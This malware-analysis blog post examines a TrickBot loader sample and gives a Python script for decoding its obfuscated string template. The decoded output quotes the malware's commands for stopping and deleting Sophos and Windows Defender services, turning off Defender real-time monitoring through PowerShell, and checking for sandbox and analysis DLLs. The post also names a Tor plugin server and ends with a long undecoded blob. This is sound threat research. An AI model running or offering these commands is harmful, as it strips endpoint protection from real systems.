programming – Reverse Engineering, Malware Deep Insight

Let’s Learn: Decoding Latest "TrickBot" Loader String Template & New Tor Plugin Server Communication

Goal: Document presence of the new TrickBot Tor plugin server and deobfuscate the latest TrickBot Loader malware string template.
Trick Loader MD5: 6124c863c08f92732da180d4cf7cbf38

Fake Danske Bank FW: Recent BACs delivers Trickbot https://t.co/1kcL0cPpoa pic.twitter.com/10kHnCuhFZ

— My Online Security (@dvk01uk) July 12, 2018

https://platform.twitter.com/widgets.jsOutline

I. Background

II. New Discovery: Tor Plugin Server in Config

III. TrickBot Loader Deobfuscation Walkthrough

IV. Analysis of Deobfuscated TrickBot Loader

A. Checks for the presence of the virtual machine processes and analysis DLLs

B. Injected process

C. Imported DLL

D. Command-line arguments via

cmd.exe & PowerShell -DisableRealtimeMonitoring

E. Checks for processes

F. Configuration storage

G. Directory name in %APPDATA%

H. Oddities
V. Analysis of Latest TrickBot Core Possible Build ‘1041’
A. Hardcoded Tor Relay List
B. External IP Resolution
C. Task Scheduler XML Struct
D. Bot IP Check for Spam Blocklist

I. Background
While analyzing one of the latest TrickBot samples from the impersonated Danske Bank sender (thanks to @dvk01uk for the sample), I decided to take a deeper dive into TrickBot Loader.
II. New Discovery: Tor Plugin Server in Config
The TrickBot crew recently implemented a plugin server communication via Tor .onion on port:448 to fetch malware modules.

7-11-2018: #TrickBot #banker group conf jmp+2
1000224 -> 1000226 (skip /225)
Observation: It seems the group is experimenting with .onion nginx proxy module fetcher (–port 448) via lm3vzydqdw2orekm[.onion:448 | only via TOR🧐
New blockist | Latest IOCs: https://t.co/AmHLEzoMTJ pic.twitter.com/h5LYbgkArv

— Vitali Kremez (@VK_Intel) July 11, 2018

It is a novel technique for TrickBot; it is likely they are experimenting with the Tor connector in order to improve and/or sustain first-layer module and proxy server resiliency. It is also possible that the Tor connector would be a new norm for the TrickBot crew to not only fetch modules but also for client-server communications similarly as it is performed in the other malware variants such as Gozi ISFB Botnet “4000”.
III. TrickBot Loader Deobfuscation Walkthrough
A. Retrieve the first self-injected unpacked TrickBot payload in memory and dump as an executable and disk.
B. Locate the encoded string template in OllyDBG and set up a hardware breakpoint on access (DWORD), and run until you see the key and template execution.

C. Dump and save the encoded template ‘data’ with its ‘key’;
D. Decode the custom Base64 obfuscated string template (thanks to @sysopfb for the script) by entering the encoded template to ‘data’ and its key to ‘key’; and

import base64


data = 'dUQGvV0XC3hkvV0\x00vKYkvV0IbVyM\x00dUQM9UN0PuhkvV0\x00q/YUqmigCXAIbVyM\x00EWqp\x00dlbWPVFX9BhG2Vo\x00mVSXvnxp\x00d7JpvlfGqHhkvV0\x009nSWPVxWPHhkvV0\x00bVfKPVxMdBhkvV0\x009liGdlihcnYMvt\x00qmigmUy5bHhkvV0\x00oUfgboYMvBhkvV0\x00olQfv3hkvV0\x00bVGHml9Q9VJZcnYMvt\x00oUqHcnYMvt\x00qUSk9KfpCXAIbVyM\x00dUhrPVMIbVyM\x00DxJNYw9N\x00uoxxdUxH\x00opFVxN9iokxdD/GWdnFXvUbpmN9gvnY59lC1DGYdElxHdnxI9NbGdKJgvUhd\x00o7f5b7xW9whQv/o\x00YmbQv7xQ9VG5v1\x00opFVxN9iokxdD/GWdnFXvUbpmNbgdKYSq/01D/NWPVGIbE\x002XJNJobOJpqhcDGiJDwzJOCUJHphCOqXcowyCWtHJOYVEkxOJlp\x002XbNYwEUYOdpcoC0COdzJwolJuSBJXbicooSJXE0TDkSYDApElp\x00bmQ0vVFHbmAIbmQG\x00qny5vUYhAVf5vlYhAVfMquikbui3v7xk2ui3vlYp2ui3vVw1vVQGAVJQdVGpq/GIbui3vVF5bVoQ\x00vUyGCXAIbVyM\x009lYXqmigCXA\x00xSYDY/hSv/xHqmYGoUxXdUG5vKJi\x00xSYDYKfGboSGv/FH2E\x00xSYDYUxpE/JpPmbGEUFIdUFMbxJGdlJgvUhfbt\x00xSYDomxGdKGxdUxHxVFeb/r\x00oUxoqUfEdnGUP/yGbUo\x00Y/yG9nNpP/FITkNkv/GIPmJpdnNpvlAQvnxlT1\x00cny5b0\x00qUygb/hpmUGk\x00f/EGbBxkc1\x009mJGdWCHcnYMvt\x00EpyDuoYVdnFzolYHP/hK\x00uoGwYKf5vxJpdnGIb0\x00EXgdo7f5blfQvuiVP/yGdSyDvliZvlJdoUF0PVFXANJhdlYGvuiEdnFpb/JpP/FIm7JXdBhG2Vo\x00qUSkcnxrbE\x00cUC1vnxpA7Jpvlt1opN/oUxH9nGWbE\x00cUC1vnxpA7Jpvlt1opN/E/YzP/hDbmfUP/JG\x00cUC1vnxpA7Jpvlt1oUF0PVFXAwNS9VFxdVYQ9Vo1oUxH9nGWbE\x00cUC1vnxpA7Jpvlt1oUF0PVFXYVNpqxfGqUFHbVxHoUxH9nGWbE\x00cUC1vnxpA7Jpvlt1oUF0PVFXAwSOoHiibUxI9t\x00cUC1vnxpA7Jpvlt1oUF0PVFXAwSOoHiOvVGGvKE\x00cUC1vnxpA7Jpvlt1dUF0PVFXdliX\x00cUC1vnxpA7Jpvlt1oUhpdBiDbmfUP/JG\x00cUC1vnxpA7Jpvlt1oUF0PVFXAN9Gq3iOvUhpdnFMANJGdKbgqUo\x00cUC1vnxpA7Jpvlt1dl9gmlJGdKbgqUo\x00cUC1vnxpA7Jpvlt1dl9gmlx0bVNpbxaUJt\x00EXgdo7f5blfQvuiVP/yGdSyDvliZvlJdoUF0PVFXANJhdlYGvuiEdnFpb/JpP/FImOwIbmQG\x00EXgdo7f5blfQvuiVP/yGdSyJq/ylqmfGqKGpbmJdE/hpPuSJq/ylqmfGmwSBEoSDbmfUP/JGcnxrbE\x00cUC1dUC1dlY5dBimP/hwb/bGvnE\x00cUC1dUC1bVxMbmYGAN9gvkYGbnxIbt\x00DmJJdwxIbHhG2Vo\x00DxJiopJSPo0IbmQG\x00DxJiopJSPuhG2Vo\x00cUC1dVFlbmfXPVxMvBiDbmEzDmiEdnxnbmfGvnJGABSwPmJQqnyGonxQv7Ygv/xJvUhg9VFHP/hKABYpdKxG\x00opFVxN9iokxdoVFMP/JgbmJdD/GWdnFXvUbpmN9gvnY59lC1YVxnb/hkbmA\x00YVGXq/fMboNI9VGDd7GlqmfG\x00opFVxN9iokxdD/GWdnFXvUbpmN9gvnY59lC1YVxnb/hkbmA1oUxW9mfg97k1EUxI9VxHmwh59VGnP/JQ9VG5vKC\x00YVGXq/fMboh59VGnP/JQ9VG5vKC\x00xUGIYVxnb/hk\x00mwbioE\x00mNfNEoYJYuhzbt\x00DofiDxJGdKbgqUo\x00opN/oUxH9nGWbE\x00oUNUoUxH9nGWbuhG2Vo\x00EoyJvUrIbmQG\x00oUF0PVFXYGCIbmQG\x00EoyX9nCIbmQG\x00EUyGq/rIbmQG\x00opN/E/YzP/hDbmfUP/JGcnxrbE\x00oUNUoUxH9nGWbuhG2Vo\x00EoyJvUrIbmQG\x00cUC1dUC1dlY5dBiDExbDbmfUP/JG\x00cUC1dUC1bVxMbmYGANJixGJGdKbgqUo\x00opFVxN9iokxdD/GWdnFXvUbpmN9gvnY59lC1DGYdElxHdnxI9NbGdKJgvUhdu/SQbUo1YnGMbuiN2VxW9mYgvUr1DlipP/FId0\x00YVx39/9KbmA\x00PUgebUQSblxnbKGePnQeP1\x00'
key = 'tiBOwNV7AfLcCJT8EYuDox/mqbPvd92R1Q3WkGnKZgjeMzI50yHXpSUlrh64aFs+'
std_b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

for s in data.split('\x00'):
    s = s.translate(str.maketrans(key,std_b64))
    if len(s)%4 != 0:
        s += '='*(4 - len(s)%4)
    print(base64.b64decode(s))

E. Review the output

b'shell32.dll'
b'ntdll.dll'
b'shlwapi.dll'
b'advapi32.dll'
b'B64'
b'svchost.exe'
b'\\msnet'
b'pstorec.dll'
b'vmcheck.dll'
b'dbghelp.dll'
b'wpespy.dll'
b'api_log.dll'
b'SbieDll.dll'
b'SxIn.dll'
b'dir_watch.dll'
b'Sf2.dll'
b'cmdvrt32.dll'
b'snxhk.dll'
b'MSEDGE'
b'IEUser'
b'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\'
b'ProductName'
b'Evaluation'
b'SOFTWARE\\Microsoft\\Virtual Machine'
b'{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
b'{6EDD6D74-C007-4E75-B76A-E5740995E24C}'
b'explorer.exe'
b'bloody booty bla de bludy botty bla lhe capitaine bloode!'
b'ole32.dll'
b'wtsapi32'
b'WTSEnumerateSessionsA'
b'WTSFreeMemory'
b'WTSGetActiveConsoleSessionId'
b'WTSQueryUserToken'
b'SeTcbPrivilege'
b'Elevation:Administrator!new:'
b'.log'
b'client_id'
b'%d%d%d.'
b'user32.dll'
b'CLSIDFromString'
b'IIDFromString'
b'C:\\Program Files\\Sophos\\Sophos System Protection\\ssp.exe'
b'cmd.exe'
b'/c net stop SAVService'
b'/c net stop SAVAdminService'
b'/c net stop Sophos AutoUpdate Service'
b'/c net stop SophosDataRecorderService'
b'/c net stop Sophos MCS Agent'
b'/c net stop Sophos MCS Client'
b'/c net stop sophossps'
b'/c net stop Sntp Service'
b'/c net stop Sophos Web Control Service'
b'/c net stop swi_service'
b'/c net stop swi_update_64'
b'C:\\Program Files\\Sophos\\Sophos System Protection\\1.exe'
b'C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'
b'/c sc stop WinDefend'
b'/c sc delete WinDefend'
b'MsMpEng.exe'
b'MSASCuiL.exe'
b'MSASCui.exe'
b'/c powershell Set-MpPreference -DisableRealtimeMonitoring $true'
b'SOFTWARE\\Policies\\Microsoft\\Windows Defender'
b'DisableAntiSpyware'
b'SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications'
b'DisableNotifications'
b'WinDefend'
b'\\FAQ'
b'\\README.md'
b'MBAMService'
b'SAVService'
b'SavService.exe'
b'ALMon.exe'
b'SophosFS.exe'
b'ALsvc.exe'
b'Clean.exe'
b'SAVAdminService.exe'
b'SavService.exe'
b'ALMon.exe'
b'/c sc stop SAVService'
b'/c sc delete SAVService'
b'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
b'Debugger'
b'kjkghuguffykjhkj'

IV. Analysis of Deobfuscated TrickBot Loader
The TrickBot Loader contains various logic targeting and “relaxing” various security measures on the host machine including stopping a plethora of Sophos and Windows Defender anti-virus services. Additionally, TrickBot Loader executes a Powershell script disabling real-time monitoring via “powershell Set-MpPreference -DisableRealtimeMonitoring $true”. Based on the analysis of the Loader, the crew is primarily concerned about Sophos, Windows Defender, and MalwareBytes anti-virus engines. Currently, this Loader installs itself and creates a directory “msnet” in %APPDATA%.
The oddities of the TrickBot loader include ever-present string ‘bloody booty bla de bludy botty bla lhe capitaine bloode!’ as well as a random ‘kjkghuguffykjhkj’ ones. The TrickBot crew appears to reference the US movie “Captain Blood” (“Capitaine Blood” in French), in which “[i]n 1685, Dr. Peter Blood was arrested for assisting a wounded rebel in a revolt against King James II of England…Blood and Levasseur [main nemesis of Blood. -VK] not being able to agree on the attribution of this “booty”, a duel ensues where Blood kills Levasseur, before starting on the way to Jamaica to deposit Arabella and the royal delegate.”
It is notable that the group consistently improves its loader since its rather crude GetModuleHandle anti-analysis DLL check implementation in late 2017.
A. Checks for the presence of the virtual machine processes and analysis DLL;

b'pstorec.dll'
b'vmcheck.dll'
b'dbghelp.dll'
b'wpespy.dll'
b'api_log.dll'
b'SbieDll.dll'
b'SxIn.dll'
b'dir_watch.dll'
b'Sf2.dll'
b'cmdvrt32.dll'
b'snxhk.dll

B. Injected process;

b'svchost.exe'

C. Imported DLLs;

b'shell32.dll'
b'ntdll.dll'
b'shlwapi.dll'
b'advapi32.dll'
b'ole32.dll'
b'user32.dll'

D. Command-line arguments via cmd.exe;

/c powershell Set-MpPreference -DisableRealtimeMonitoring $true'
b'/c net stop SAVService'
b'/c net stop SAVAdminService'
b'/c net stop Sophos AutoUpdate Service'
b'/c net stop SophosDataRecorderService'
b'/c net stop Sophos MCS Agent'
b'/c net stop Sophos MCS Client'
b'/c net stop sophossps'
b'/c net stop Sntp Service'
b'/c net stop Sophos Web Control Service'
b'/c net stop swi_service'
b'/c net stop swi_update_64'
b'/c sc stop SAVService'
b'/c sc delete SAVService'

E. Checks for processes and services;

b'MBAMService'
b'SAVService'
b'SavService.exe'
b'ALMon.exe'
b'SophosFS.exe'
b'ALsvc.exe'
b'Clean.exe'
b'SAVAdminService.exe'
b'SavService.exe'
b'ALMon.exe'
b'MsMpEng.exe'
b'MSASCuiL.exe'
b'MSASCui.exe'
b'C:\\Program Files\\Sophos\\Sophos System Protection\\1.exe'
b'C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'
b'C:\\Program Files\\Sophos\\Sophos System Protection\\ssp.exe'

F. Configuration storage;

b'\\FAQ'
b'\\README.md'

G. Directory name in %APPDATA%;

b'\\msnet'

H: Oddities

b'bloody booty bla de bludy botty bla lhe capitaine bloode!'
b'kjkghuguffykjhkj'

II. Update: July 26, 2018: Analysis of Latest TrickBot Core Possible Build ‘1041’
This exact methodology also works to decode the bot core template.

import base64

data = 's27kD6oUsVHWbWAeD645DIT tIf04osR4VdBbyfyM2YWsw 8IsRmldjGTs1myWeD67X427xByYjQ6k BEdWQV8W8276MVdjDy/WDC8rDIfqMw ssHoTUsNsh7UDIw 86sxB280bl8WbCHdDy4j asA3toAATLU14IYk tC88m2seGTW14yfeD2oxM2f1TldjQ6sRbw DC8UDIw14IYk TIoxML45Dy8oGl8WDCH5D67V TIoxModWD2f64T45DIstbIsqsw TIoxModWD2f64Td0Q6XRDIoRMob TE8eTE8easb TIoxModWDyoX4TsvmIs1b6WjDWb TIoxMLoU4Ld0Q6XRDIoRMob TIoxML45Dy8IM2YWtyoX4sb Tx0zsxoBaa7UDIw BEd7bl8rM270bCWTD/HxbyW14/b BEd7bl8tmld5DymTDxd5DyoeGsb B/d4ToBRzh7UDIw B6fsDyW1MV85Q2Y5GyT B6fPbys0mIsdDCHxQ27q4B D6YWzR314IYk T6sxT6sqmVd5mlWL4VHqbyWwmIfe8IoqD+ a275mIW0DIWF4sHWQEseMV878IsRQEd5bl8jbu B6fwGsH54+ 86sxtIs14E8nT6WU T6sx827xbyWWbxW1B2Hksw 86sxT6sqmVd5mlWdDy4j T6sxT6sqmVd5mlWdDy4j T6sxtyoX428t42H/byWxGTW14yfV TysCT6sxsyokm2soGob TysCtEAWDUXWGTsvsw TysCB6Yjb6si4VU TysCBEdWQV8Wa6s78V0V Tys64VdxsIft42Yy B28gmVHxsIfc427BbyW6M2YW46sR tIfjMEswTld5myWk42mWsyokm2sV BEd7bl8l4V83QVHnTIoeQ2x BEd7bl8AQEo/MVdWB6f1mIsvmob BEd7bl8t4V8i4VWBQVd0DB BEd7bl8a42YWQVHWB6f1mIsvm+ B6f1mysemoHxbyW14/HWQEseMV878IsRQEd5bl8jbW8jT6sqmVd5mlWL4VHqbyWwmIfesw BEd7bl8dDVAjbC8i4VU BEd7bl8Pbys0mIs3QVHn BEd7bl8L42HeGVAx BEd7bl8L4VHxbyf7aIoRM+ BEd7bl83QVHn8IoxQB BEd7bl8L4VHxbyf7a6s7 B2YkD6H0mIsADy8dDyWxM2okMV5WT6WU 8CdW4sH54+ tEAWDWAeD6HWbEHTD6XWDu 8Vo/Q2YtM2B BEdWQV8WTldjQ6sRbxoRsVHWbWb 8lswDIWqQV8WsIfc427oG+ tIfjMEswB2HqDEs1moH54ob 86sxsIfc427dDy4jby/0mIWjDu 86sxsVHWbU70D2sV BT82BsAdzR314IYk BEdWQV8WsIfjDI0WDl+RzWH1QVARMIfx TldjQ6sRbRzetysvmob TldjQ6sRbRze8yWebE8V tVskmIWrGV8WsIfVM28WB600bu s6WU4THnQVdTDx//Dl85BCWx4B 86sxt2fUm2YWaIo14IYWBB TVsWbCWB4VdyDEdXQ27q4THjm27x4V3 86sxBEsebys1mo8nbys04LWU T6sxs27nQ27UDIsU8V0q4VAxM2f18yWkmIse s27nQ27UDIsU8V0q4VAxM2f18yWkmIse DlHxbyYWDUL 86sxBEsebys1moAeD6HWbEHd4+ 86sxTEWRmIsXsIWX4ToR8yWk4s85D2T 86sxBEsebys1moAeD6HWbEz 86sxsyseb6WjDUsvsw 86sxsyseb6WjDu T6sx8yWk4sAjM27x4V3 sEd5mIsIM2YW Tys04L45DIT BEdWQV8W8yWk4sb DlHxbyHXbIWV 86sxsIsXbL45DIsNQ2/Wsw BEdWQV8WTldjQ6sRb/b t2f64T45DIsoGob 86sxsIWqMxHjm27x a275mIW0DIWF4THeMV85Q6okT6sqmIWjDUo14oHwM27PDEs1m+ T6YW4V+ 86sx8yWk4Toxmld5QCsx4VHV 86sxt2fUm2YW8yWk4T70D2sV 86sxTE80bC8/bLW14yfV 86sxsIsXboA0mI0V t2f64T45DIsV T6sxBEsebys1mL85bysqmIfeGsb 8Isk4V8W8yWk4sb DlHxbyHwGsb tIfqQ2YIbysW BEdWQV8WtVsx4V0V TysRm2/WsI0e42oU sEd5mIsBbyfq4VHRt2sXDEd7 8lswDIWqQV8WaIo14IYW BEdWQV8W8V4WDC8V 86sx8V05mLHj4IsTMldWQ2B syWemls0DLokDIfq8Vu syWemls0DoAeDE8WQE8oG+ sIseD2W1QV8WTldjQ6sRbw Tys04oAeD6HWbEHH42/jbCU syWemls0DL4e42soG+ tEAWDWAeD6HWbEz BEdWQV8WTysXDE8WsI0e42oU T6sx8V4WDCB BEdWQV8W8IWe42HxDEd7sw T6sx8yWk4Toxmld5QCsx4VHV DlHxbyHXbLL tIf04LY5QCd0bCWA 86sx8yWk4s85D2T 8yW14L7WGl8IM2YWsw 86sxTEWRmIsXa27yDw tIfqM/dWb6f/byHW 8yW14LHkDEHW 86sxtIoRmLsebyfe DlHxbyHwG27V T6sx8yWk4s85D2T 86sxt2fUm2YWaIo14IYWsw tIf04odWb6f/byHW 8CdW4TY5QCd0bCU 8yW14odWb6f/byHWsw 8yW14L45bCHx8yWk4sb 86sx8CskDoA0mI0NQ2/Wsw DlHxbyYWDWb DlHxbyHXbob 86sxB6fXblsx4VdNQ2/Wsw BEdWQV8WsI0e42oU iRfyDEdXQVBfmIsvm+ mEmEiy/74V0x4Vd1Q2Y5br7qD6x M28WDCB1D2T QVA5iyWwiCHh VIWjQ6fwGB s6o1modWDIs0b6T 4yWymlU Q6/Uiysv4B ztu/iqBYiqL/HrvYzR+FNt+wzB zRb1zqTeiqL7zrvYHRQFHPBR NP31ztLviqLEiq3RHtnxHPz NPz1ztQRiqL6HrvYHtn7zP+R HqU1ztQRiqzxiqLEzRnxHPz ztT7iqu7iqL/zavezRLFNt+wzB zqLeiqBEiq3xHhvezqUFNt+wzw NPB1HP+1ztLeiqbwNqUwzPL zhvYzRb1ztQ1zqB/NqUwzPL ztU7iq3xNavezqz1Hq3FHPBR ztu/iq3eiqLEzhvezRbFHPBR NPu1NtU1zqL6iqL7HPn7zP+Y ztu/iqLRiqz7iqL7HRnxHPz ztQeiq3xHevEzhvezPLFHPBR ztbxiqLeHeveztb1HRzFHtT/HtB B6f1mIs1mr/z427CmIuF3+ PBnHru dVzudszuao8TTrZYiqLHrU0jbEBF3rsRdVzWTw iyf1M2f1 M27yDe7UQVB TUsA8L/oiy/U 8Uo8 8Lsr8w tToPaLWN8sYttx4Tsxoa8sYHM2HeDEHj4C8bt2WqbyfRD64x3Lo1mIWXQ2YEQVdWVLsvQ6Y/b6WjDCHbTIoxMlz tToPaLWN8sYttx4Tsxoa8sYBD6Y5Q6WWb/YHM2HeDEHj4C8bs6W14IfEbeAL424WDy8WbWYoGIHkmVH5D67RVoA0mI0R tToPaLWN8sYttx4Tsxoa8sYHM2HeDEHj4C8bs6W14IfEbeAL424WDy8WbWYoGIHkmVH5D67RVoA0mI0R s6W18Isy427U 86YjQyokVrTwNIYQdt+xDouWDlT 3lmjbyX5Dyb bIoxM+ myseiC8vm+ t2fUm2YWTVsWbCU tIs0mysPbyWxM2H0DoHWQE85D6v 827x4VdPbyWxM2H0DoHWQE85D6v a275mIW0DIWF4THeMV85Q6okT6sqmIWjDu sUsaTw T6WCDyoxmVdWtIs14E8n 8THPTosrtLWPBUY9Bu 8THLTxopTPzvH+ bEA0Da7UDCHhDr7RDEdhbe714VB 4I7RQywXza7/Q6swbyfx42Hxiy7Wm+ Qh7hQVdeQ2H/4Ioq427xbyokiyfe4w Q6dkiyohmVHWQVB1DEdC Gys1iCHwQ2/nQVsRiyfe4w 86sxtyoxMV4WTEWRmIsXa27yDw t2fUm2YW3IWR3I7jmrA6Q2Y54+ Q6Y5427xV6WU zt+xzB iEAkQ2W1i6HkM2s1mIWw iE8WGlB iEd0mw i6Ww iEAkQ2W1 MV+1Q277bEdqiy7Wm+ mE8yMVHXG2WwiyHjDB DVWWGl8Wby70DIWwiyHjDB M2H0Dy00GyWwiyHjDB QVA5iyWwM247iyfe4w MVA5Dy4jiyWj MVAWQ60jiy7Wm+ Q60WQ6X5br70D2oFD670mEz1Q6fX bEHWbCB 8PnnBtkS8xLSNRXV8rUnBtkS8xLSNRXrBaUnBtkS8xLSNRXt2aUnBtkS8xLSNRXaBeU 86YjQyokVL//mIL iaxWbexXPBnHru iaxWbwxKB6f1mIs1mr/LMVHwDEH5mIWjDqnu4yfeDa/UQV80NeA1Q2/W9a3WTe3HruxK B6f1mIs1mr/TGVAWNhAXm2YxMVA0bCBj4yfeDa/UQV80NeAhDEs14IoeGtxWbwxKB6f1mIs1mr/z427CmIuF3rsUPBnHru iaxXiaxXByf/Dy80bCUWzP0Q m6W1bE80zoYU4240m2Yx s/8tTVsWbCWsb6sesIfc42v s/8t86sxB2HxMV4WB6f1b6fk4sHWbEH5D67d4+ s/8t8CdW4T/WD2feGB s/8t827/D2seQV8WT6sRb6WjDCHA mE8RQVA5zR3 86sxTldjQxoU4ldWbEz tIf04LY5QCd0bCWV 8V05moAeD6HWbEz TysR4V8omys1m+ B6Yjb6s3Q27UDIT s6o5mL4jbWH5Dymk4TfhMysqm+ T6WCDyokt6dg42HxB27Us6o5m+ bE4qMIfRmr7WGIT Tysk42oR4B 8CdW4Td/4y4Wbu B6f1mldjD+ TE80bCB tIf04rAxDeAH3I40M2YW4+ TCs13LBu4yo5DIsU tIf04rAxDeAB3I40M2YW4+ 8yW14rAB3I40M2YW4+ BEdWQV8W3o5B3I40M2YW4+ t2fUm2YW3I00beA0DldWQ2873IdW42vuDIf04IsU bIoe427x4yWk4Vz MV+ M2B bIseM2fU 4yWk4B Q6f14u QVdC Q6f1mldjD+ DysW4IW14yZ QVsxD6HjDC8eD6w QVsxD6HjDyQ bldjQ6sRb670D2T bEWR G2sR QVsxDEHxQVdx 9I/j4lsk42HjDy454Rvg9rfXD68/DIsqD67yM2bO dVzWbw dVzWb/fqD67yM2mRV+ t2fUm2YWb/w aIs0bodWB2YkD6z aIs0bL4e42T 86sxTldjQ6sRbx0WQV+ aIs0bLokDIfq M6seDyskzR314IYk zrvwiq+1z+ TLfts+ 8xsT sVdk8VHqQVAWsw b60km6owMB BUHeGVAx8IsRmldjGTXWGB BUHeGVAxB6Yjb6sADImjbyWxMI/Bbyf6M28Wbu BUHeGVAxsyseM247T6WCDyoxmVdW BUHeGVAx86sxTldjbIsemlU BUHeGVAxa2/wDEdxa6s7TIo5bu BUHeGVAxtEAWDUok46feMV8nDsAeDE454Ise tUHeGVAx8CdW4TfhMysqm+ tUHeGVAx8Isk4V8Wa6s7 tUHeGVAxa2/wDEdxa6s7 tUHeGVAxtEAWDWHxDEd046sBbyf6M28Wbu ByHeGVAxiy8kD+ tyHeGVAxiy8kD+ dVzudVzuT/+W4+ GPu6 GPQx s27cDyfEDu s6W14IfEbe+ezP+w s6W14IfEbeAQT+ s6W14IfEbeAt4Vd64V3uzq+wzw s6W14IfEbeA2MVHxQB s6W14IfEbeAt4Vd64V3uzq+wN+ s6W14IfEbe+E s6W14IfEbeAt4Vd64V3uzq+wNrAazu s6W14IfEbe+v s6W14IfEbeAt4Vd64V3uzq+Yzu s6W14IfEbe+viqL s6W14IfEbeAt4Vd64V3uzq+YzhAazu s6W14IfEbe+Yz+ s6W14IfEbe+YzrAt4Vd64V3 t2fFM2YkQaZ/iq+uKom5Dy8jmEzutWBuzt+1zPkus6W1HqBS3lu6HrUuBVAwDIsV42diMVBjHtzEiqz63r0iao8HtrwuDIWc4aAl42HcDeUuB60eD6/WiRQwiq+1zRLYzhvYztzuT6oyQVd5iRTRHevRHu blHemu bIY/46W1bw 4V0wMV3 b6semyHjDyQ d2BW4rsUiu t2fUm2YW3Iokbys04lUum27kD6oU42B B6f1mldjDrAyQ2Wk42B t2fUm2YW3lm0beA/DyYjQ28W4+ TldjQ6sRbeAnQVzuQysWDhAyM275b60W4+ bysk42oR4B TE80bCBu4yo5DIsU TldjQ6sRbeAEQVzum27kD6oU42B 86sxTIoe427xa27yDeAWbCdjbu s270QyYW3l8j3IYjQ2BuD2fUm2YW3I4eD6xub6semyse bE80bCB 8IsqD68W3I4eD6xuBUot8tQx3Isebyfe s6W1zR3u4VdeDE3 a276Q2Y54rAwQVd0DVzuQ6f/DCB tyZubIoeQ2/R M27yDw 4IoxQB dVzjdVzjHqBjdVzjdVzjdVzj Dyf1Q2/W dVzjdVzjHqzjdVzjdVzjdVzjdVzj iesRiesRiR3/iesRiw iesRiesRiR3RiesUiw iesRiesRiRLxiesRiesRiR+j iesRiesRiRLwiesRiesRiesUiw iesRiesRiRTjdVzj iesRiesRiRLjdVzj iesRiesRiR+jdVzjdVzjdVzjdVzjdVzj bEd6 QE8k DyoX4B D2fUm2YW tVHtGVHx42/VQV8qMIse dVz1dVz1dVz1dVz dVz1dVz dsUXd2xXd28TdTuFdTxFdsz 9rfsb6sea2BO 9osR4Vdd4Pv 9LYj46f1slWw4t7dDC8WbyoqmIW64s8jM6s19rfzD6mjDW87bITOrqYam27z4V4WDP7z42oRmoAeMV45DIsC4twjTCs1tIs642wO 9od/DUYWmysk9U05460WbE8Amyo5DIohDITZi/d/DUYWmysk9unZ8EdjmVAd4P7NsrAAss83t/ddsoWbT/WtsLsH9rflbyf/bLWU9unZtIfCD67TGVAW9UW1mIseQ2HxMV4WsIfc42vZixYj46f1slWw4tvK 9rfrD6fxsld546mWbqvK 9LdjDE8TbyWC46se9unZ8270QyYW4P7xbCsW9rfoDyohDIsU9un 9rfPD6/XQ27U9unZixsv42zOrqwjB2HxM2f1bRvK9rfTQVHc9un 9rfBbyW1Q6WwQ2wOrqwjTld5DyH5bIokbRvK9oHWml85DymR9unZtVskmIWwDIsdDCHxQ27q4VHBD6Y5QEUOa2m1DEdWtysE9rfHm2YxMVAk4TW1bE80DyHWb/AjDIWqGtvK9L85b6okDIfETE80bC8d4Uf1ByoxmIseM2sR9y40DlHW9rfLMVH0DIYjm/HxQVdxa249DUd0ml8WbyWWbRvK9oHxDEAd4UmjM27Ct67rQV8x4Vd54VzO4yokb6TZi/HxDEAd4UmjM27Ct67rQV8x4Vd54VzOrqYADIYjmx00by8T4VdXM270mITO4yokb6TZixokDIfEaIoe4o8Wby/5Dyox4tvK9oHxQVdxs60WDUo6Q2WkQ2dk4t7xbCsW9rftmIoemomn427Amyo5DIohDITOrqYam279DyY7a24N4V8EDEdcBV40M2Y0QyYW9y40DlHW9rfam279DyY7a24N4V8EDEdcBV40M2Y0QyYW9unZa28k4sHWml85DymR9unZTE8jbLf1a28k4Ts14P7xbCsW9rftmIfwt67d4IYW827U9unZTysRmIoemLf1a28k4t7yQ2YR4twjTysRmIoemLf1a28k4tvK9rfd4IYWT6sxmIW14EzOrqYADIYjm/HxQVdxt67L42/0DyBOmld/4twjB2YkDEmtmIoemLf18IsXQ27U9unZ8270QyYW4P7xbCsW9rfoDyohDIsU9unZaIWU4Is19C8em2TZix054I8WDqvK9od/DUf1DlWd4UWUDITO4yokb6TZi/d/DUf1DlWd4UWUDITOrqYVQ2XWsIfam2vO4yokb6TZi/m0M6sTD/d/DqvK9Lsv42H/mIWjDW85D2szM2/5mP7BsPAt9rfoGIsqmV85D67TM2/WtIWXMVBOrqYBbyWjbyWxGtvE9rfBbyWjbyWxGtvK9rft4V8xM27CbRvK9LoqmIWjDCzuB6f1mIsvmPxhBVsxMIfe3qvK9Lsv42zOrqYPD6/XQ27U9u 9rftmIoemLdjm27UQVd79unZ8270QyYW4P7xbCsW9rfoDyohDIsU9unZT6Hn428/DIsrGT80GtvK9L80GVHdDC8WbC40DPvY9rfLQVWRa27x4Vd6Q2wOrqwjT6Hn428/DIsrGT80GtvK9rfPQ2YWDy80bW8eM2mC4V3Orqwjsld546mWbCzOrqYBbyW1Q6WwQ2YR9unZTld5DyH5bIok3IWU9adAmV8nDE3h9un 9LH0DIs14Ioesld546mWbqvK9odWbIsxMV85D6vOrqYdDC8WbC40DP7BsPLwttwja27x4Vd6Q2wOrqYLmVd0mIWjDq7BzTBZix8/byoxM2f19unZTE8jbLox8lseQV85D67oDyBO4yokb6TZi/HxDEAAmL8/byoxM2f1827U9unZi/dWbIsxMV85D6vOrqYtmIoemLdjm27UQVd79u 